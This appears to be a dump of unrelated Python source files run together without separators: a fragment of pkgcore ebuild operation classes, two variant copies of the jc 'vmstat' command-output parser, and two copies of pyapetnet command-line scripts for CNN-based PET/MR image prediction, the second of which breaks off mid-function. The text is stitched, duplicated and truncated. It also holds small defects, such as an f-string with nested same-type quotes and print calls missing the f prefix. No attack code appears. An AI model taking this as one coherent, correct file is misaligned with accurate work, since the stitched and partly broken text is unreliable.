misc_operations(ebd): def __init__(self, domain, *args, **kwds): self.domain = domain super().__init__(*args, **kwds) def configure(self, observer=None): return self._generic_phase('config', False, True) def info(self, observer=None): return self._generic_phase('info', True, True) class built_operations(ebuild_operations, format.operations): def __init__(self, domain, pkg, observer=None, initial_env=None): format.operations.__init__(self, domain, pkg, observer=observer) self._initial_env = initial_env self._localized_ebd = None def _cmd_implementation_localize(self, observer, force=False): if not force and getattr(self.pkg, '_is_from_source', False): return self.pkg self._localized_ebd = op = binpkg_localize( self.domain, self.pkg, clean=False, initial_env=self._initial_env, env_data_source=self.pkg.environment, observer=observer) return op.finalize() def _cmd_implementation_cleanup(self, observer, force=False): if not self._localized_ebd: return True return self._localized_ebd.cleanup(force=force) def _cmd_check_support_configure(self): pkg = self.pkg if 'config' not in pkg.mandatory_phases: return False return True def _cmd_implementation_configure(self, observer): misc = misc_operations( self.domain, self.pkg, env_data_source=self.pkg.environment, clean=True) try: misc.start() misc.configure() finally: misc.cleanup() return True
"""jc - JSON CLI output utility `vmstat` command output parser Options supported: `-a`, `-w`, `-d`, `-t` The `epoch` calculated timestamp field is naive (i.e. based on the local time of the system the parser is run on) The `epoch_utc` calculated timestamp field is timezone-aware and is only available if the timezone field is UTC. Usage (cli): $ vmstat | jc --vmstat or $ jc vmstat Usage (module): import jc.parsers.vmstat result = jc.parsers.vmstat.parse(vmstat_command_output) Schema: [ { "runnable_procs": integer, "uninterruptible_sleeping_procs": integer, "virtual_mem_used": integer, "free_mem": integer, "buffer_mem": integer, "cache_mem": integer, "inactive_mem": integer, "active_mem": integer, "swap_in": integer, "swap_out": integer, "blocks_in": integer, "blocks_out": integer, "interrupts": integer, "context_switches": integer, "user_time": integer, "system_time": integer, "idle_time": integer, "io_wait_time": integer, "stolen_time": integer, "disk": string, "total_reads": integer, "merged_reads": integer, "sectors_read": integer, "reading_ms": integer, "total_writes": integer, "merged_writes": integer, "sectors_written": integer, "writing_ms": integer, "current_io": integer, "io_seconds": integer, "timestamp": string, "timezone": string, "epoch": integer, # naive timestamp if -t flag is used "epoch_utc": integer # aware timestamp if -t flag is used and UTC TZ } ] Examples: $ vmstat | jc --vmstat -p [ { "runnable_procs": 2, "uninterruptible_sleeping_procs": 0, "virtual_mem_used": 0, "free_mem": 2794468, "buffer_mem": 2108, "cache_mem": 741208, "inactive_mem": null, "active_mem": null, "swap_in": 0, "swap_out": 0, "blocks_in": 1, "blocks_out": 3, "interrupts": 29, "context_switches": 57, "user_time": 0, "system_time": 0, "idle_time": 99, "io_wait_time": 0, "stolen_time": 0, "timestamp": null, "timezone": null } ] $ vmstat | jc --vmstat -p -r [ { "runnable_procs": "2", "uninterruptible_sleeping_procs": "0", "virtual_mem_used": "0", "free_mem": "2794468", "buffer_mem": "2108", "cache_mem": "741208", "inactive_mem": null, "active_mem": null, "swap_in": "0", "swap_out": "0", "blocks_in": "1", "blocks_out": "3", "interrupts": "29", "context_switches": "57", "user_time": "0", "system_time": "0", "idle_time": "99", "io_wait_time": "0", "stolen_time": "0", "timestamp": null, "timezone": null } ] """ import jc.utils class info(): """Provides parser metadata (version, author, etc.)""" version = '1.0' description = '`vmstat` command parser' author = 'Kelly Brazil' author_email = 'kellyjonbrazil@gmail.com' # details = 'enter any other details here' # compatible options: linux, darwin, cygwin, win32, aix, freebsd compatible = ['linux'] magic_commands = ['vmstat'] __version__ = info.version def _process(proc_data): """ Final processing to conform to the schema. Parameters: proc_data: (List of Dictionaries) raw structured data to process Returns: List of Dictionaries. Structured to conform to the schema. """ int_list = ['runnable_procs', 'uninterruptible_sleeping_procs', 'virtual_mem_used', 'free_mem', 'buffer_mem', 'cache_mem', 'inactive_mem', 'active_mem', 'swap_in', 'swap_out', 'blocks_in', 'blocks_out', 'interrupts', 'context_switches', 'user_time', 'system_time', 'idle_time', 'io_wait_time', 'stolen_time', 'total_reads', 'merged_reads', 'sectors_read', 'reading_ms', 'total_writes', 'merged_writes', 'sectors_written', 'writing_ms', 'current_io', 'io_seconds'] for entry in proc_data: for key in entry: if key in int_list: entry[key] = jc.utils.convert_to_int(entry[key]) if entry['timestamp']: ts = jc.utils.timestamp(f'{entry['timestamp']} {entry['timezone']}') entry['epoch'] = ts.naive entry['epoch_utc'] = ts.utc return proc_data def parse(data, raw=False, quiet=False): """ Main text parsing function Parameters: data: (string) text data to parse raw: (boolean) output preprocessed JSON if True quiet: (boolean) suppress warning messages if True Returns: List of Dictionaries. Raw or processed structured data. """ if not quiet: jc.utils.compatibility(__name__, info.compatible) raw_output = [] output_line = {} procs = None buff_cache = None disk = None tstamp = None tz = None if jc.utils.has_data(data): for line in filter(None, data.splitlines()): # detect output type if not procs and not disk and line.startswith('procs'): procs = True tstamp = '-timestamp-' in line continue if not procs and not disk and line.startswith('disk'): disk = True tstamp = '-timestamp-' in line continue # skip header rows if (procs or disk) and (line.startswith('procs') or line.startswith('disk')): continue if 'swpd' in line and 'free' in line and 'buff' in line and 'cache' in line: buff_cache = True tz = line.strip().split()[-1] if tstamp else None continue if 'swpd' in line and 'free' in line and 'inact' in line and 'active' in line: buff_cache = False tz = line.strip().split()[-1] if tstamp else None continue if 'total' in line and 'merged' in line and 'sectors' in line: tz = line.strip().split()[-1] if tstamp else None continue # line parsing if procs: line_list = line.strip().split(maxsplit=17) output_line = { 'runnable_procs': line_list[0], 'uninterruptible_sleeping_procs': line_list[1], 'virtual_mem_used': line_list[2], 'free_mem': line_list[3], 'buffer_mem': line_list[4] if buff_cache else None, 'cache_mem': line_list[5] if buff_cache else None, 'inactive_mem': line_list[4] if not buff_cache else None, 'active_mem': line_list[5] if not buff_cache else None, 'swap_in': line_list[6], 'swap_out': line_list[7], 'blocks_in': line_list[8], 'blocks_out': line_list[9], 'interrupts': line_list[10], 'context_switches': line_list[11], 'user_time': line_list[12], 'system_time': line_list[13], 'idle_time': line_list[14], 'io_wait_time': line_list[15], 'stolen_time': line_list[16], 'timestamp': line_list[17] if tstamp else None, 'timezone': tz or None } raw_output.append(output_line) if disk: line_list = line.strip().split(maxsplit=11) output_line = { 'disk': line_list[0], 'total_reads': line_list[1], 'merged_reads': line_list[2], 'sectors_read': line_list[3], 'reading_ms': line_list[4], 'total_writes': line_list[5], 'merged_writes': line_list[6], 'sectors_written': line_list[7], 'writing_ms': line_list[8], 'current_io': line_list[9], 'io_seconds': line_list[10], 'timestamp': line_list[11] if tstamp else None, 'timezone': tz or None } raw_output.append(output_line) return raw_output if raw else _process(raw_output)
"""jc - JSON CLI output utility `vmstat` command output parser Options supported: `-a`, `-w`, `-d`, `-t` The `epoch` calculated timestamp field is naive (i.e. based on the local time of the system the parser is run on) The `epoch_utc` calculated timestamp field is timezone-aware and is only available if the timezone field is UTC. Usage (cli): $ vmstat | jc --vmstat or $ jc vmstat Usage (module): import jc.parsers.vmstat result = jc.parsers.vmstat.parse(vmstat_command_output) Schema: [ { "runnable_procs": integer, "uninterruptible_sleeping_procs": integer, "virtual_mem_used": integer, "free_mem": integer, "buffer_mem": integer, "cache_mem": integer, "inactive_mem": integer, "active_mem": integer, "swap_in": integer, "swap_out": integer, "blocks_in": integer, "blocks_out": integer, "interrupts": integer, "context_switches": integer, "user_time": integer, "system_time": integer, "idle_time": integer, "io_wait_time": integer, "stolen_time": integer, "disk": string, "total_reads": integer, "merged_reads": integer, "sectors_read": integer, "reading_ms": integer, "total_writes": integer, "merged_writes": integer, "sectors_written": integer, "writing_ms": integer, "current_io": integer, "io_seconds": integer, "timestamp": string, "timezone": string, "epoch": integer, # naive timestamp if -t flag is used "epoch_utc": integer # aware timestamp if -t flag is used and UTC TZ } ] Examples: $ vmstat | jc --vmstat -p [ { "runnable_procs": 2, "uninterruptible_sleeping_procs": 0, "virtual_mem_used": 0, "free_mem": 2794468, "buffer_mem": 2108, "cache_mem": 741208, "inactive_mem": null, "active_mem": null, "swap_in": 0, "swap_out": 0, "blocks_in": 1, "blocks_out": 3, "interrupts": 29, "context_switches": 57, "user_time": 0, "system_time": 0, "idle_time": 99, "io_wait_time": 0, "stolen_time": 0, "timestamp": null, "timezone": null } ] $ vmstat | jc --vmstat -p -r [ { "runnable_procs": "2", "uninterruptible_sleeping_procs": "0", "virtual_mem_used": "0", "free_mem": "2794468", "buffer_mem": "2108", "cache_mem": "741208", "inactive_mem": null, "active_mem": null, "swap_in": "0", "swap_out": "0", "blocks_in": "1", "blocks_out": "3", "interrupts": "29", "context_switches": "57", "user_time": "0", "system_time": "0", "idle_time": "99", "io_wait_time": "0", "stolen_time": "0", "timestamp": null, "timezone": null } ] """ import jc.utils class info(): """Provides parser metadata (version, author, etc.)""" version = '1.0' description = '`vmstat` command parser' author = 'Kelly Brazil' author_email = 'kellyjonbrazil@gmail.com' # details = 'enter any other details here' # compatible options: linux, darwin, cygwin, win32, aix, freebsd compatible = ['linux'] magic_commands = ['vmstat'] __version__ = info.version def _process(proc_data): """ Final processing to conform to the schema. Parameters: proc_data: (List of Dictionaries) raw structured data to process Returns: List of Dictionaries. Structured to conform to the schema. """ int_list = ['runnable_procs', 'uninterruptible_sleeping_procs', 'virtual_mem_used', 'free_mem', 'buffer_mem', 'cache_mem', 'inactive_mem', 'active_mem', 'swap_in', 'swap_out', 'blocks_in', 'blocks_out', 'interrupts', 'context_switches', 'user_time', 'system_time', 'idle_time', 'io_wait_time', 'stolen_time', 'total_reads', 'merged_reads', 'sectors_read', 'reading_ms', 'total_writes', 'merged_writes', 'sectors_written', 'writing_ms', 'current_io', 'io_seconds'] for entry in proc_data: for key in entry: if key in int_list: entry[key] = jc.utils.convert_to_int(entry[key]) if entry['timestamp']: ts = jc.utils.timestamp(f'{entry["timestamp"]} {entry["timezone"]}') entry['epoch'] = ts.naive entry['epoch_utc'] = ts.utc return proc_data def parse(data, raw=False, quiet=False): """ Main text parsing function Parameters: data: (string) text data to parse raw: (boolean) output preprocessed JSON if True quiet: (boolean) suppress warning messages if True Returns: List of Dictionaries. Raw or processed structured data. """ if not quiet: jc.utils.compatibility(__name__, info.compatible) raw_output = [] output_line = {} procs = None buff_cache = None disk = None tstamp = None tz = None if jc.utils.has_data(data): for line in filter(None, data.splitlines()): # detect output type if not procs and not disk and line.startswith('procs'): procs = True tstamp = '-timestamp-' in line continue if not procs and not disk and line.startswith('disk'): disk = True tstamp = '-timestamp-' in line continue # skip header rows if (procs or disk) and (line.startswith('procs') or line.startswith('disk')): continue if 'swpd' in line and 'free' in line and 'buff' in line and 'cache' in line: buff_cache = True tz = line.strip().split()[-1] if tstamp else None continue if 'swpd' in line and 'free' in line and 'inact' in line and 'active' in line: buff_cache = False tz = line.strip().split()[-1] if tstamp else None continue if 'total' in line and 'merged' in line and 'sectors' in line: tz = line.strip().split()[-1] if tstamp else None continue # line parsing if procs: line_list = line.strip().split(maxsplit=17) output_line = { 'runnable_procs': line_list[0], 'uninterruptible_sleeping_procs': line_list[1], 'virtual_mem_used': line_list[2], 'free_mem': line_list[3], 'buffer_mem': line_list[4] if buff_cache else None, 'cache_mem': line_list[5] if buff_cache else None, 'inactive_mem': line_list[4] if not buff_cache else None, 'active_mem': line_list[5] if not buff_cache else None, 'swap_in': line_list[6], 'swap_out': line_list[7], 'blocks_in': line_list[8], 'blocks_out': line_list[9], 'interrupts': line_list[10], 'context_switches': line_list[11], 'user_time': line_list[12], 'system_time': line_list[13], 'idle_time': line_list[14], 'io_wait_time': line_list[15], 'stolen_time': line_list[16], 'timestamp': line_list[17] if tstamp else None, 'timezone': tz or None } raw_output.append(output_line) if disk: line_list = line.strip().split(maxsplit=11) output_line = { 'disk': line_list[0], 'total_reads': line_list[1], 'merged_reads': line_list[2], 'sectors_read': line_list[3], 'reading_ms': line_list[4], 'total_writes': line_list[5], 'merged_writes': line_list[6], 'sectors_written': line_list[7], 'writing_ms': line_list[8], 'current_io': line_list[9], 'io_seconds': line_list[10], 'timestamp': line_list[11] if tstamp else None, 'timezone': tz or None } raw_output.append(output_line) return raw_output if raw else _process(raw_output)
import os import argparse from glob import glob def list_models(): parser = argparse.ArgumentParser(description= 'list available trained models for pyapetnet') parser.add_argument('--model_path', help = 'absolute path of directory containing trained models', default = None) args = parser.parse_args() #------------------------------------------------------------------------------------------------- # parse input parameters import pyapetnet model_path = args.model_path if model_path is None: model_path = os.path.join(os.path.dirname(pyapetnet.__file__),'trained_models') #------------------------------------------------------------------------------------------------- cfg_files = sorted(glob(os.path.join(model_path, '*', 'config.json'))) print(f'\nModel path: {model_path}') print('\nAvailable models') print('----------------') for i,cfg_file in enumerate(cfg_files): print(f'{os.path.basename(os.path.dirname(cfg_file))}') print(f'\nFor details about the models, read \n{os.path.join(model_path,'model_description.md')}\nor the look at the config.json files in the model directories') #------------------------------------------------------------------------------------------------------ #------------------------------------------------------------------------------------------------------ #------------------------------------------------------------------------------------------------------ #------------------------------------------------------------------------------------------------------ def predict_from_nifti(): parser = argparse.ArgumentParser(description='pyapetnet prediction of anatomy-guided \ PET reconstruction') parser.add_argument('pet_fname', help = 'absolute path of PET input nifti file') parser.add_argument('mr_fname', help = 'absolute path of MR input nifti file') parser.add_argument('model_name', help = 'name of trained CNN') parser.add_argument('--model_path', help = 'absolute path of directory containing trained models', default = None) parser.add_argument('--output_dir', help = 'name of the output directory', default = '.') parser.add_argument('--output_name', help = 'basename of prediction file', default = None) parser.add_argument('--no_coreg', help = 'do not coregister input volumes', action = 'store_true') parser.add_argument('--no_crop', help = 'do not crop volumes to MR bounding box', action = 'store_true') parser.add_argument('--show', help = 'show the results', action = 'store_true') parser.add_argument('--verbose', help = 'print (extra) verbose output', action = 'store_true') parser.add_argument('--no_preproc_save', help = 'do not save preprocessed volumes', action = 'store_true') parser.add_argument('--output_on_mr_grid', help = 'regrid the CNN output to the original MR grid', action = 'store_true') args = parser.parse_args() #------------------------------------------------------------------------------------------------- # load modules import pyapetnet from pyapetnet.preprocessing import preprocess_volumes from pyapetnet.utils import load_nii_in_ras import nibabel as nib import json import tensorflow as tf import numpy as np import matplotlib.pyplot as plt import pymirc.viewer as pv from pymirc.image_operations import aff_transform #------------------------------------------------------------------------------------------------- # parse input parameters pet_fname = args.pet_fname mr_fname = args.mr_fname model_name = args.model_name output_dir = args.output_dir output_name = args.output_name if output_name is None: output_name = f'prediction_{model_name}.nii' model_path = args.model_path if model_path is None: model_path = os.path.join(os.path.dirname(pyapetnet.__file__),'trained_models') coreg_inputs = not args.no_coreg crop_mr = not args.no_crop show = args.show verbose = args.verbose save_preproc = not args.no_preproc_save output_on_mr_grid = args.output_on_mr_grid #------------------------------------------------------------------------------------------------- # load the trained model co ={'ssim_3d_loss': None,'mix_ssim_3d_mae_loss': None} if verbose: print('loading CNN {os.path.join(model_path, model_name)}') model = tf.keras.models.load_model(os.path.join(model_path, model_name), custom_objects = co) # load the voxel size used for training with open(os.path.join(model_path, model_name, 'config.json')) as f: cfg = json.load(f) training_voxsize = cfg['internal_voxsize']*np.ones(3) #------------------------------------------------------------------ # load and preprocess the input PET and MR volumes pet, pet_affine = load_nii_in_ras(pet_fname) mr, mr_affine = load_nii_in_ras(mr_fname) # preprocess the input volumes (coregistration, interpolation and intensity normalization) pet_preproc, mr_preproc, o_aff, pet_scale, mr_scale = preprocess_volumes(pet, mr, pet_affine, mr_affine, training_voxsize, perc = 99.99, coreg = coreg_inputs, crop_mr = crop_mr) #------------------------------------------------------------------ # the actual CNN prediction x = [np.expand_dims(np.expand_dims(pet_preproc,0),-1), np.expand_dims(np.expand_dims(mr_preproc,0),-1)] pred = model.predict(x).squeeze() # undo the intensity normalization pred *= pet_scale pet_preproc *= pet_scale mr_preproc *= mr_scale #------------------------------------------------------------------ # save the preprocessed input and output os.makedirs(output_dir, exist_ok = True) if save_preproc: nib.save(nib.Nifti1Image(pet_preproc, o_aff), os.path.join(output_dir, 'pet_preproc.nii')) if verbose: print('wrote pre-processed PET to: {os.path.join(output_dir, "pet_preproc.nii")}') nib.save(nib.Nifti1Image(mr_preproc, o_aff), os.path.join(output_dir, 'mr_preproc.nii')) if verbose: print('wrote pre-processed MR to: {os.path.join(output_dir, "mr_preproc.nii")}') # save the intensity normalization factors np.savetxt(os.path.join(output_dir, 'preproc_scaling_factors.txt'), np.array([pet_scale,mr_scale])) if verbose: print('wrote scaling factors to: {os.path.join(output_dir, "preproc_scaling_factors.txt")}') if output_on_mr_grid: oss = np.ceil(np.linalg.norm(mr_affine[:-1,:-1], axis = 0)/training_voxsize).astype(int) pred_regrid = aff_transform(pred, np.linalg.inv(o_aff) @ mr_affine, mr.shape, cval = pred.min(), os0 = oss[0], os1 = oss[1], os2 = oss[2]) nib.save(nib.Nifti1Image(pred_regrid, mr_affine), os.path.join(output_dir, output_name)) else: nib.save(nib.Nifti1Image(pred, o_aff), os.path.join(output_dir, output_name)) if verbose: print('wrote prediction to : {os.path.join(output_dir, output_name)}') #------------------------------------------------------------------ # show the results if show: pmax = np.percentile(pred,99.9) mmax = np.percentile(mr_preproc,99.9) ims = [{'vmin':0, 'vmax': mmax, 'cmap': plt.cm.Greys_r}, {'vmin':0, 'vmax': pmax}, {'vmin':0, 'vmax': pmax}] vi = pv.ThreeAxisViewer([np.flip(mr_preproc,(0,1)),np.flip(pet_preproc,(0,1)),np.flip(pred,(0,1))], imshow_kwargs = ims) plt.show() #------------------------------------------------------------------------------------------------------ #------------------------------------------------------------------------------------------------------ #------------------------------------------------------------------------------------------------------ #------------------------------------------------------------------------------------------------------ def predict_from_dicom(): parser = argparse.ArgumentParser(description='pyapetnet prediction of anatomy-guided \ PET reconstruction') parser.add_argument('pet_dcm_dir', help = 'absolute path of PET input dicom directory') parser.add_argument('mr_dcm_dir', help = 'absolute path of MR input dicom directory') parser.add_argument('model_name', help = 'name of trained CNN') parser.add_argument('--pet_dcm_pattern', help = 'file pattern for PET dicom dir', default = '*') parser.add_argument('--mr_dcm_pattern', help = 'file pattern for MR dicom dir', default = '*') parser.add_argument('--model_path', help = 'absolute path of directory containing trained models', default = None) parser.add_argument('--output_dir', help = 'name of the output directory', default = '.') parser.add_argument('--output_name', help = 'basename of prediction file', default = None) parser.add_argument('--no_coreg', help = 'do not coregister input volumes', action = 'store_true') parser.add_argument('--no_crop', help = 'do not crop volumes to MR bounding box', action = 'store_true') parser.add_argument('--show', help = 'show the results', action = 'store_true') parser.add_argument('--verbose', help = 'print (extra) verbose output', action = 'store_true') parser.add_argument('--no_preproc_save', help = 'do not save preprocessed volumes', action = 'store_true') parser.add_argument('--output_on_mr_grid', help = 'regrid the CNN output to the original MR grid', action = 'store_true') args = parser.parse_args() #------------------------------------------------------------------------------------------------- # load modules import pyapetnet from pyapetnet.preprocessing import preprocess_volumes from pyapetnet.utils import load_nii_in_ras from pymirc.fileio import DicomVolume, write_3d_static_dicom import nibabel as nib import json import tensorflow as tf import numpy as np import matplotlib.pyplot as plt import pymirc.viewer as pv from pymirc.image_operations import aff_transform from pyapetnet.utils import flip_ras_lps, pet_dcm_keys_to_copy from warnings import warn #------------------------------------------------------------------------------------------------- # parse input parameters pet_dcm_dir = args.pet_dcm_dir mr_dcm_dir = args.mr_dcm_dir pet_dcm_pattern = args.pet_dcm_pattern mr_dcm_pattern = args.mr_dcm_pattern model_name = args.model_name output_dir = args.output_dir output_name = args.output_name if output_name is None: output_name = f'prediction_{model_name}' model_path = args.model_path if model_path is None: model_path = os.path.join(os.path.dirname(pyapetnet.__file__),'trained_models') coreg_inputs = not args.no_coreg crop_mr = not args.no_crop show = args.show verbose = args.verbose save_preproc = not args.no_preproc_save output_on_mr_grid = args.output_on_mr_grid #------------------------------------------------------------------------------------------------- # load the trained model co ={'ssim_3d_loss': None,'mix_ssim_3d_mae_loss': None} if verbose: print('loading CNN {os.path.join(model_path, model_name)}') model = tf.keras.models.load_model(os.path.join(model_path, model_name), custom_objects = co) # load the voxel size used for training with open(os.path.join(model_path, model_name, 'config.json')) as f: cfg = json.load(f) training_voxsize = cfg['internal_voxsize']*np.ones(3) #------------------------------------------------------------------ # load and preprocess the input PET and MR volumes pet_dcm = DicomVolume(os.path.join(pet_dcm_dir, pet_dcm_pattern)) mr_dcm = DicomVolume(os.path.join(mr_dcm_dir, mr_dcm_pattern)) pet = pet_dcm.get_data() mr = mr_dcm.get_data() pet_affine = pet_dcm.affine mr_affine = mr_dcm.affine # preprocess the input volumes (coregistration, interpolation and intensity normalization) pet_preproc, mr_preproc, o_aff, pet_scale, mr_scale = preprocess_volumes(pet, mr, pet_affine, mr_affine, training_voxsize, perc = 99.99, coreg = coreg_inputs, crop_mr = crop_mr) #------------------------------------------------------------------ # the actual CNN prediction x = [np.expand_dims(np.expand_dims(pet_preproc,0),-1), np.expand_dims(np.expand_dims(mr_preproc,0),-1)] pred = model.predict(x).squeeze() # undo the intensity normalization pred *= pet_scale pet_preproc *= pet_scale mr_preproc *= mr_scale #------------------------------------------------------------------ # save the preprocessed input and output # dicom volumes are read as LPS, but nifti volumes have to be in RAS os.makedirs(output_dir, exist_ok = True) if save_preproc: nib.save(nib.Nifti1Image(*flip_ras_lps(pet_preproc, o_aff)), os.path.join(output_dir, 'pet_preproc.nii')) if verbose: print('wrote pre-processed PET to: {os.path.join(output_dir, "pet_preproc.nii")}') nib.save(nib.Nifti1Image(*flip_ras_lps(mr_preproc, o_aff)), os.path.join(output_dir, 'mr_preproc.nii')) if verbose: print('wrote pre-processed MR to: {os.path.join(output_dir, "mr_preproc.nii")}') # save the intensity normalization factors np.savetxt(os.path.join(output_dir, 'preproc_scaling_factors.txt'), np.array([pet_scale,mr_scale])) if verbose: print('wrote scaling factors to: {os.path.join(output_dir, "preproc_scaling_factors.txt")}') if output_on_mr_grid: oss = np.ceil(np.linalg.norm(mr_affine[:-1,:-1], axis = 0)/training_voxsize).astype(int) pred_regrid = aff_transform(pred, np.linalg.inv(o_aff) @ mr_affine, mr.shape, cval = pred.min(), os0 = oss[0], os1 = oss[1], os2 = oss[2]) nib.save(nib.Nifti1Image(*flip_ras_lps(pred_regrid, mr_affine)), os.path.join(output_dir, f'{output_name}.nii')) else: nib.save(nib.Nifti1Image(*flip_ras_lps(pred, o_aff)), os.path.join(output_dir, f'{output_name}.nii')) #------------------------------------------------------------------ # save prediction also as dicom # get a list of dicom keys to copy from the original PET dicom header dcm_kwargs = {} for key in pet_dcm_keys_to_copy(): try: dcm_kwargs[key] = getattr(pet_dcm.firstdcmheader,key) except AttributeError: warn('Cannot copy tag ' + key) # write the dicom volume output_dcm_dir = os.path.join(output_dir, output_name) if not os.path.exists(output_dcm_dir): if output_on_mr_grid: write_3d_static_dicom(pred_regrid, output_dcm_dir, affine = mr_affine, ReconstructionMethod = 'CNN MAP Bowsher', SeriesDescription = f'CNN MAP Bowsher {model_name}', **dcm_kwargs) else: write_3d_static_dicom(pred, output_dcm_dir, affine = o_aff, ReconstructionMethod = 'CNN MAP Bowsher', SeriesDescription = f'CNN MAP Bowsher {model_name}', **dcm_kwargs) else: warn('Output dicom directory already exists. Not ovewrting it') #------------------------------------------------------------------ # show the results if show: pmax = np.percentile(pred,99.9) mmax = np.percentile(mr_preproc,99.9) ims = [{'vmin':0, 'vmax': mmax, 'cmap': plt.cm.Greys_r}, {'vmin':0, 'vmax': pmax}, {'vmin':0, 'vmax': pmax}] vi = pv.ThreeAxisViewer([mr_preproc, pet_preproc, pred], imshow_kwargs = ims) plt.show()
import os import argparse from glob import glob def list_models(): parser = argparse.ArgumentParser(description= 'list available trained models for pyapetnet') parser.add_argument('--model_path', help = 'absolute path of directory containing trained models', default = None) args = parser.parse_args() #------------------------------------------------------------------------------------------------- # parse input parameters import pyapetnet model_path = args.model_path if model_path is None: model_path = os.path.join(os.path.dirname(pyapetnet.__file__),'trained_models') #------------------------------------------------------------------------------------------------- cfg_files = sorted(glob(os.path.join(model_path, '*', 'config.json'))) print(f'\nModel path: {model_path}') print('\nAvailable models') print('----------------') for i,cfg_file in enumerate(cfg_files): print(f'{os.path.basename(os.path.dirname(cfg_file))}') print(f'\nFor details about the models, read \n{os.path.join(model_path,"model_description.md")}\nor the look at the config.json files in the model directories') #------------------------------------------------------------------------------------------------------ #------------------------------------------------------------------------------------------------------ #------------------------------------------------------------------------------------------------------ #------------------------------------------------------------------------------------------------------ def predict_from_nifti(): parser = argparse.ArgumentParser(description='pyapetnet prediction of anatomy-guided \ PET reconstruction') parser.add_argument('pet_fname', help = 'absolute path of PET input nifti file') parser.add_argument('mr_fname', help = 'absolute path of MR input nifti file') parser.add_argument('model_name', help = 'name of trained CNN') parser.add_argument('--model_path', help = 'absolute path of directory containing trained models', default = None) parser.add_argument('--output_dir', help = 'name of the output directory', default = '.') parser.add_argument('--output_name', help = 'basename of prediction file', default = None) parser.add_argument('--no_coreg', help = 'do not coregister input volumes', action = 'store_true') parser.add_argument('--no_crop', help = 'do not crop volumes to MR bounding box', action = 'store_true') parser.add_argument('--show', help = 'show the results', action = 'store_true') parser.add_argument('--verbose', help = 'print (extra) verbose output', action = 'store_true') parser.add_argument('--no_preproc_save', help = 'do not save preprocessed volumes', action = 'store_true') parser.add_argument('--output_on_mr_grid', help = 'regrid the CNN output to the original MR grid', action = 'store_true') args = parser.parse_args() #------------------------------------------------------------------------------------------------- # load modules import pyapetnet from pyapetnet.preprocessing import preprocess_volumes from pyapetnet.utils import load_nii_in_ras import nibabel as nib import json import tensorflow as tf import numpy as np import matplotlib.pyplot as plt import pymirc.viewer as pv from pymirc.image_operations import aff_transform #------------------------------------------------------------------------------------------------- # parse input parameters pet_fname = args.pet_fname mr_fname = args.mr_fname model_name = args.model_name output_dir = args.output_dir output_name = args.output_name if output_name is None: output_name = f'prediction_{model_name}.nii' model_path = args.model_path if model_path is None: model_path = os.path.join(os.path.dirname(pyapetnet.__file__),'trained_models') coreg_inputs = not args.no_coreg crop_mr = not args.no_crop show = args.show verbose = args.verbose save_preproc = not args.no_preproc_save output_on_mr_grid = args.output_on_mr_grid #------------------------------------------------------------------------------------------------- # load the trained model co ={'ssim_3d_loss': None,'mix_ssim_3d_mae_loss': None} if verbose: print('loading CNN {os.path.join(model_path, model_name)}') model = tf.keras.models.load_model(os.path.join(model_path, model_name), custom_objects = co) # load the voxel size used for training with open(os.path.join(model_path, model_name, 'config.json')) as f: cfg = json.load(f) training_voxsize = cfg['internal_voxsize']*np.ones(3) #------------------------------------------------------------------ # load and preprocess the input PET and MR volumes pet, pet_affine = load_nii_in_ras(pet_fname) mr, mr_affine = load_nii_in_ras(mr_fname) # preprocess the input volumes (coregistration, interpolation and intensity normalization) pet_preproc, mr_preproc, o_aff, pet_scale, mr_scale = preprocess_volumes(pet, mr, pet_affine, mr_affine, training_voxsize, perc = 99.99, coreg = coreg_inputs, crop_mr = crop_mr) #------------------------------------------------------------------ # the actual CNN prediction x = [np.expand_dims(np.expand_dims(pet_preproc,0),-1), np.expand_dims(np.expand_dims(mr_preproc,0),-1)] pred = model.predict(x).squeeze() # undo the intensity normalization pred *= pet_scale pet_preproc *= pet_scale mr_preproc *= mr_scale #------------------------------------------------------------------ # save the preprocessed input and output os.makedirs(output_dir, exist_ok = True) if save_preproc: nib.save(nib.Nifti1Image(pet_preproc, o_aff), os.path.join(output_dir, 'pet_preproc.nii')) if verbose: print('wrote pre-processed PET to: {os.path.join(output_dir, "pet_preproc.nii")}') nib.save(nib.Nifti1Image(mr_preproc, o_aff), os.path.join(output_dir, 'mr_preproc.nii')) if verbose: print('wrote pre-processed MR to: {os.path.join(output_dir, "mr_preproc.nii")}') # save the intensity normalization factors np.savetxt(os.path.join(output_dir, 'preproc_scaling_factors.txt'), np.array([pet_scale,mr_scale])) if verbose: print('wrote scaling factors to: {os.path.join(output_dir, "preproc_scaling_factors.txt")}') if output_on_mr_grid: oss = np.ceil(np.linalg.norm(mr_affine[:-1,:-1], axis = 0)/training_voxsize).astype(int) pred_regrid = aff_transform(pred, np.linalg.inv(o_aff) @ mr_affine, mr.shape, cval = pred.min(), os0 = oss[0], os1 = oss[1], os2 = oss[2]) nib.save(nib.Nifti1Image(pred_regrid, mr_affine), os.path.join(output_dir, output_name)) else: nib.save(nib.Nifti1Image(pred, o_aff), os.path.join(output_dir, output_name)) if verbose: print('wrote prediction to : {os.path.join(output_dir, output_name)}') #------------------------------------------------------------------ # show the results if show: pmax = np.percentile(pred,99.9) mmax = np.percentile(mr_preproc,99.9) ims = [{'vmin':0, 'vmax': mmax, 'cmap': plt.cm.Greys_r}, {'vmin':0, 'vmax': pmax}, {'vmin':0, 'vmax': pmax}] vi = pv.ThreeAxisViewer([np.flip(mr_preproc,(0,1)),np.flip(pet_preproc,(0,1)),np.flip(pred,(0,1))], imshow_kwargs = ims) plt.show() #------------------------------------------------------------------------------------------------------ #------------------------------------------------------------------------------------------------------ #------------------------------------------------------------------------------------------------------ #------------------------------------------------------------------------------------------------------ def predict_from_dicom(): parser = argparse.ArgumentParser(description='pyapetnet prediction of anatomy-guided \ PET reconstruction') parser.add_argument('pet_dcm_dir', help = 'absolute path of PET input dicom directory') parser.add_argument('mr_dcm_dir', help = 'absolute path of MR input dicom directory') parser.add_argument('model_name', help = 'name of trained CNN') parser.add_argument('--pet_dcm_pattern', help = 'file pattern for PET dicom dir', default = '*') parser.add_argument('--mr_dcm_pattern', help = 'file pattern for MR dicom dir', default = '*') parser.add_argument('--model_path', help = 'absolute path of directory containing trained models', default = None) parser.add_argument('--output_dir', help = 'name of the output directory', default = '.') parser.add_argument('--output_name', help = 'basename of prediction file', default = None) parser.add_argument('--no_coreg', help = 'do not coregister input volumes', action = 'store_true') parser.add_argument('--no_crop', help = 'do not crop volumes to MR bounding box', action = 'store_true') parser.add_argument('--show', help = 'show the results', action = 'store_true') parser.add_argument('--verbose', help = 'print (extra) verbose output', action = 'store_true') parser.add_argument('--no_preproc_save', help = 'do not save preprocessed volumes', action = 'store_true') 